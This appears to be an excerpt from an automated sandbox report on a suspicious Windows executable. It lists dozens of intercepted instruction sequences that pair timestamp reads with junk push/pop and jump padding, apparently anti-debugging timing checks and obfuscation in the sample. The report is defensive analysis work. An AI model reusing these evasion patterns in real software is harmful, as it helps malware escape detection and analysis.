              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 122EED6 second address: 122EEDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 122EEDA second address: 122EEDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 122EEDE second address: 122EEEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F420070EDEAh 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 122F18C second address: 122F198 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F4200FD2916h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 122F198 second address: 122F1B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F420070EDF2h 0x00000009 jnp 00007F420070EDE6h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 122F1B4 second address: 122F1DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4200FD291Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d je 00007F4200FD2924h 0x00000013 jmp 00007F4200FD291Eh 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 122F4D1 second address: 122F4D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 110638F second address: 11063AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4200FD2928h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 11063AD second address: 11063BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jns 00007F420070EDE6h 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 1232567 second address: 123256B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 123256B second address: 123256F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 123256F second address: 1232575 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 1233BC9 second address: 1233BD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 1233BD0 second address: 1233BD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 123667D second address: 1236683 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 1236683 second address: 12366F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F4200FD2925h 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push ebx 0x00000011 call 00007F4200FD2918h 0x00000016 pop ebx 0x00000017 mov dword ptr [esp+04h], ebx 0x0000001b add dword ptr [esp+04h], 00000018h 0x00000023 inc ebx 0x00000024 push ebx 0x00000025 ret 0x00000026 pop ebx 0x00000027 ret 0x00000028 add edx, dword ptr [ebp+1246A53Fh] 0x0000002e clc 0x0000002f push 00000004h 0x00000031 push esi 0x00000032 mov dx, E941h 0x00000036 pop edx 0x00000037 sub dword ptr [ebp+122D195Ch], edx 0x0000003d call 00007F4200FD2919h 0x00000042 jmp 00007F4200FD2924h 0x00000047 push eax 0x00000048 push ecx 0x00000049 push eax 0x0000004a push edx 0x0000004b pushad 0x0000004c popad 0x0000004d rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 12366F9 second address: 1236711 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F420070EDE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push ecx 0x00000010 jnl 00007F420070EDECh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 1236711 second address: 123671E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 mov eax, dword ptr [eax] 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 123671E second address: 1236724 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 1239D9F second address: 1239DA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 1154A73 second address: 1154A78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 4B0044B second address: 4B00451 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 4B00451 second address: 4B00455 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 4B206BC second address: 4B206C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 4B206C0 second address: 4B206DD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F420070EDF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 4B206DD second address: 4B2072E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F4200FD2927h 0x00000009 adc si, D0AEh 0x0000000e jmp 00007F4200FD2929h 0x00000013 popfd 0x00000014 mov ah, 01h 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F4200FD291Fh 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 4B2072E second address: 4B20782 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov edi, 3C407D58h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], ebp 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F420070EDEDh 0x00000017 sbb esi, 54B7EA46h 0x0000001d jmp 00007F420070EDF1h 0x00000022 popfd 0x00000023 mov edx, eax 0x00000025 popad 0x00000026 mov ebp, esp 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F420070EDF4h 0x00000031 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 4B20782 second address: 4B20786 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 4B20786 second address: 4B2078C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 4B2078C second address: 4B2079D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4200FD291Dh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 4B2079D second address: 4B207DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F420070EDF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push edi 0x00000010 pop ecx 0x00000011 pushfd 0x00000012 jmp 00007F420070EDEFh 0x00000017 jmp 00007F420070EDF3h 0x0000001c popfd 0x0000001d popad 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 4B207DF second address: 4B20851 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4200FD2929h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F4200FD2927h 0x00000011 and ah, FFFFFFFEh 0x00000014 jmp 00007F4200FD2929h 0x00000019 popfd 0x0000001a mov ax, 2747h 0x0000001e popad 0x0000001f xchg eax, ecx 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F4200FD2924h 0x00000029 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 4B20851 second address: 4B20855 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 4B20855 second address: 4B2085B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 4B2085B second address: 4B208CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F420070EDEEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F420070EDEEh 0x00000011 xor ah, FFFFFF88h 0x00000014 jmp 00007F420070EDEBh 0x00000019 popfd 0x0000001a call 00007F420070EDF8h 0x0000001f pop eax 0x00000020 popad 0x00000021 push eax 0x00000022 jmp 00007F420070EDECh 0x00000027 xchg eax, esi 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F420070EDF7h 0x0000002f rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 4B208CE second address: 4B208F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4200FD2929h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-04h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 4B208F4 second address: 4B208FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 4B20996 second address: 4B2099A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 4B2099A second address: 4B2099E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 4B2099E second address: 4B209A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 4B209A4 second address: 4B209C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F420070EDF1h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b cmp dword ptr [ebp-04h], 00000000h 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 mov si, 47C9h 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 4B209C6 second address: 4B209CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 4B209CA second address: 4B209F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 movzx eax, dx 0x00000009 popad 0x0000000a mov esi, eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F420070EDF9h 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 4B209F3 second address: 4B209F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 4B209F9 second address: 4B20A2B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F420070EDEAh 0x00000009 sbb ecx, 12C9D278h 0x0000000f jmp 00007F420070EDEBh 0x00000014 popfd 0x00000015 mov bx, cx 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b je 00007F420070EE53h 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 4B20A2B second address: 4B20A2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 4B20A2F second address: 4B20A46 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F420070EDF3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 4B20A46 second address: 4B20A4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 4B20A4C second address: 4B20A50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 4B20A73 second address: 4B20A8D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F4200FD2922h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 4B20A8D second address: 4B20AB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, esi 0x00000007 pushad 0x00000008 mov ebx, 39099BB0h 0x0000000d mov esi, edi 0x0000000f popad 0x00000010 pop esi 0x00000011 pushad 0x00000012 mov edi, 25C49174h 0x00000017 pushad 0x00000018 movsx edx, si 0x0000001b mov dl, al 0x0000001d popad 0x0000001e popad 0x0000001f leave 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 movzx esi, di 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 4B20AB5 second address: 4B20ABA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 4B20ABA second address: 4B10178 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F420070EDF0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 retn 0004h 0x0000000c nop 0x0000000d sub esp, 04h 0x00000010 xor ebx, ebx 0x00000012 cmp eax, 00000000h 0x00000015 je 00007F420070EF4Ah 0x0000001b mov dword ptr [esp], 0000000Dh 0x00000022 call 00007F420429B0F1h 0x00000027 mov edi, edi 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 4B10178 second address: 4B1017C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 4B1017C second address: 4B10199 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F420070EDF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 4B10199 second address: 4B101C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4200FD2921h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F4200FD291Eh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov edx, ecx 0x00000015 movzx eax, di 0x00000018 popad 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 4B101C7 second address: 4B101CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 4B101CD second address: 4B101D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 4B101D1 second address: 4B101F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c call 00007F420070EDF5h 0x00000011 pop esi 0x00000012 movsx edi, si 0x00000015 popad 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 4B101F7 second address: 4B101FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 4B101FD second address: 4B10201 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 4B10201 second address: 4B10219 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4200FD291Ch 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 4B10219 second address: 4B1025B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F420070EDEBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub esp, 2Ch 0x0000000c jmp 00007F420070EDF6h 0x00000011 xchg eax, ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F420070EDF7h 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 4B1025B second address: 4B1027F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4200FD2929h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 4B1027F second address: 4B10283 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 4B10283 second address: 4B10289 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 4B10289 second address: 4B10313 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F420070EDEBh 0x00000009 xor si, 2B6Eh 0x0000000e jmp 00007F420070EDF9h 0x00000013 popfd 0x00000014 mov ch, 4Ch 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, ebx 0x0000001a pushad 0x0000001b pushad 0x0000001c mov bx, D3DAh 0x00000020 pushad 0x00000021 popad 0x00000022 popad 0x00000023 pushfd 0x00000024 jmp 00007F420070EDF1h 0x00000029 adc esi, 4DBBF256h 0x0000002f jmp 00007F420070EDF1h 0x00000034 popfd 0x00000035 popad 0x00000036 xchg eax, edi 0x00000037 jmp 00007F420070EDEEh 0x0000003c push eax 0x0000003d jmp 00007F420070EDEBh 0x00000042 xchg eax, edi 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 pushad 0x00000048 popad 0x00000049 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 4B10313 second address: 4B1032E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4200FD2927h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 4B1037E second address: 4B10399 instructions: 0x00000000 rdtsc 0x00000002 mov di, CBAEh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov cx, di 0x0000000b popad 0x0000000c mov edi, 00000000h 0x00000011 pushad 0x00000012 pushad 0x00000013 mov ebx, eax 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 4B10399 second address: 4B1042D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop edx 0x00000006 popad 0x00000007 popad 0x00000008 inc ebx 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F4200FD2928h 0x00000010 sub cx, E058h 0x00000015 jmp 00007F4200FD291Bh 0x0000001a popfd 0x0000001b pushfd 0x0000001c jmp 00007F4200FD2928h 0x00000021 or cl, FFFFFFB8h 0x00000024 jmp 00007F4200FD291Bh 0x00000029 popfd 0x0000002a popad 0x0000002b test al, al 0x0000002d jmp 00007F4200FD2926h 0x00000032 je 00007F4200FD2B05h 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007F4200FD2927h 0x0000003f rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 4B1042D second address: 4B10433 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 4B10433 second address: 4B10437 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 4B10437 second address: 4B1044E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea ecx, dword ptr [ebp-14h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F420070EDEAh 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 4B104DE second address: 4B10581 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F4200FD291Fh 0x00000009 and si, 6CBEh 0x0000000e jmp 00007F4200FD2929h 0x00000013 popfd 0x00000014 mov ah, B2h 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 test eax, eax 0x0000001b pushad 0x0000001c call 00007F4200FD2929h 0x00000021 movzx ecx, dx 0x00000024 pop edi 0x00000025 pushad 0x00000026 movzx esi, dx 0x00000029 mov di, 3818h 0x0000002d popad 0x0000002e popad 0x0000002f jg 00007F42718B0863h 0x00000035 jmp 00007F4200FD2927h 0x0000003a js 00007F4200FD29B7h 0x00000040 jmp 00007F4200FD2926h 0x00000045 cmp dword ptr [ebp-14h], edi 0x00000048 push eax 0x00000049 push edx 0x0000004a push eax 0x0000004b push edx 0x0000004c push eax 0x0000004d push edx 0x0000004e rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 4B10581 second address: 4B10585 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 4B10585 second address: 4B1058B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\b0ho5YYSdo.exeRDTSC instruction interceptor: First address: 4B1058B second address: 4B10687 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx esi, dx 0x00000006 pushfd 0x00000007 jmp 00007F420070EDF7h 0x0000000c and esi, 2D52D79Eh 0x00000012 jmp 00007F420070EDF9h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b jne 00007F4270FECCB5h 0x00000021 pushad 0x00000022 mov si, 0303h 0x00000026 pushfd 0x00000027 jmp 00007F420070EDF8h 0x0000002c sbb eax, 595400C8h 0x00000032 jmp 00007F420070EDEBh 0x00000037 popfd 0x00000038 popad 0x00000039 mov ebx, dword ptr [ebp+08h] 0x0000003c pushad 0x0000003d mov edx, ecx 0x0000003f pushfd 0x00000040 jmp 00007F420070EDF0h 0x00000045 sbb cl, 00000028h 0x00000048 jmp 00007F420070EDEBh 0x0000004d popfd 0x0000004e popad 0x0000004f lea eax, dword ptr [ebp-2Ch] 0x00000052 pushad 0x00000053 push esi 0x00000054 pushfd 0x00000055 jmp 00007F420070EDEBh 0x0000005a and esi, 70702C6Eh 0x00000060 jmp 00007F420070EDF9h 0x00000065 popfd 0x00000066 pop esi 0x00000067 jmp 00007F420070EDF1h 0x0000006c popad 0x0000006d xchg eax, esi 0x0000006e push eax 0x0000006f push edx 0x00000070 pushad 0x00000071 jmp 00007F420070EDF3h 0x00000076 push eax 0x00000077 push edx 0x00000078 rdtsc
